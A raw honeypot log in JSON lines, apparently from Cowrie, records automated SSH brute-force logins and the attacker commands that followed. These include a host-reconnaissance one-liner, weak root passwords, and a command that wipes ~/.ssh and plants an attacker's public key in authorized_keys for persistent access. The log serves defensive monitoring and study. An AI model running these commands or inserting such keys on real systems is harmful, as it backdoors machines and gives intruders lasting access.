{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:38:33.380935Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.381641Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.382330Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.383443Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.384444Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.385189Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.385974Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.386739Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.387207Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.387740Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.388239Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.388849Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.389378Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.710797Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.711674Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:33.738549Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44528,"dst_ip":"1.2.3.4","dst_port":22,"session":"8aeaa8c3210d","protocol":"ssh","message":"New connection: 27.112.78.245:44528 (1.2.3.4:22) [session: 8aeaa8c3210d]","sensor":"my-vps","timestamp":"2025-08-26T00:38:50.923041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:38:50.923972Z","src_ip":"27.112.78.245","session":"8aeaa8c3210d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:38:51.184206Z","src_ip":"27.112.78.245","session":"8aeaa8c3210d"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":36226,"dst_ip":"1.2.3.4","dst_port":22,"session":"c28b0f2078a9","protocol":"ssh","message":"New connection: 36.89.28.139:36226 (1.2.3.4:22) [session: c28b0f2078a9]","sensor":"my-vps","timestamp":"2025-08-26T00:38:51.240713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:38:51.241421Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:38:51.427633Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234!","message":"login attempt [root/Qwer1234!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:38:52.217018Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.login.failed","username":"rootuser","password":"rootuser@2025","message":"login attempt [rootuser/rootuser@2025] failed","sensor":"my-vps","timestamp":"2025-08-26T00:38:52.268309Z","src_ip":"27.112.78.245","session":"8aeaa8c3210d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:38:52.660304Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:38:52.660986Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:38:52.661932Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:52.851975Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:38:53.287172Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.287931Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.477021Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.477986Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.550433Z","src_ip":"27.112.78.245","session":"8aeaa8c3210d"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":36232,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a360f480833","protocol":"ssh","message":"New connection: 36.89.28.139:36232 (1.2.3.4:22) [session: 1a360f480833]","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.650891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.652215Z","src_ip":"36.89.28.139","session":"1a360f480833"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:38:53.827603Z","src_ip":"36.89.28.139","session":"1a360f480833"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:38:54.570035Z","src_ip":"36.89.28.139","session":"1a360f480833"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:55.747096Z","src_ip":"36.89.28.139","session":"1a360f480833"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":36736,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbf96fa5a69d","protocol":"ssh","message":"New connection: 36.89.28.139:36736 (1.2.3.4:22) [session: dbf96fa5a69d]","sensor":"my-vps","timestamp":"2025-08-26T00:38:55.932649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:38:55.933317Z","src_ip":"36.89.28.139","session":"dbf96fa5a69d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:38:56.119730Z","src_ip":"36.89.28.139","session":"dbf96fa5a69d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:38:56.908235Z","src_ip":"36.89.28.139","session":"dbf96fa5a69d"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:57.096282Z","src_ip":"36.89.28.139","session":"c28b0f2078a9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:57.097177Z","src_ip":"36.89.28.139","session":"dbf96fa5a69d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37918,"dst_ip":"1.2.3.4","dst_port":23,"session":"20e71cdb9c3a","protocol":"telnet","message":"New connection: 212.227.235.229:37918 (1.2.3.4:23) [session: 20e71cdb9c3a]","sensor":"my-vps","timestamp":"2025-08-26T00:39:04.759150Z"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58592,"dst_ip":"1.2.3.4","dst_port":22,"session":"e95d59632d86","protocol":"ssh","message":"New connection: 24.108.102.132:58592 (1.2.3.4:22) [session: e95d59632d86]","sensor":"my-vps","timestamp":"2025-08-26T00:39:26.893979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:39:26.904435Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:39:27.072698Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.login.success","username":"root","password":"Password2024","message":"login attempt [root/Password2024] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:39:27.727915Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:39:28.089372Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:39:28.090140Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:39:28.091782Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:28.258781Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:39:28.686131Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
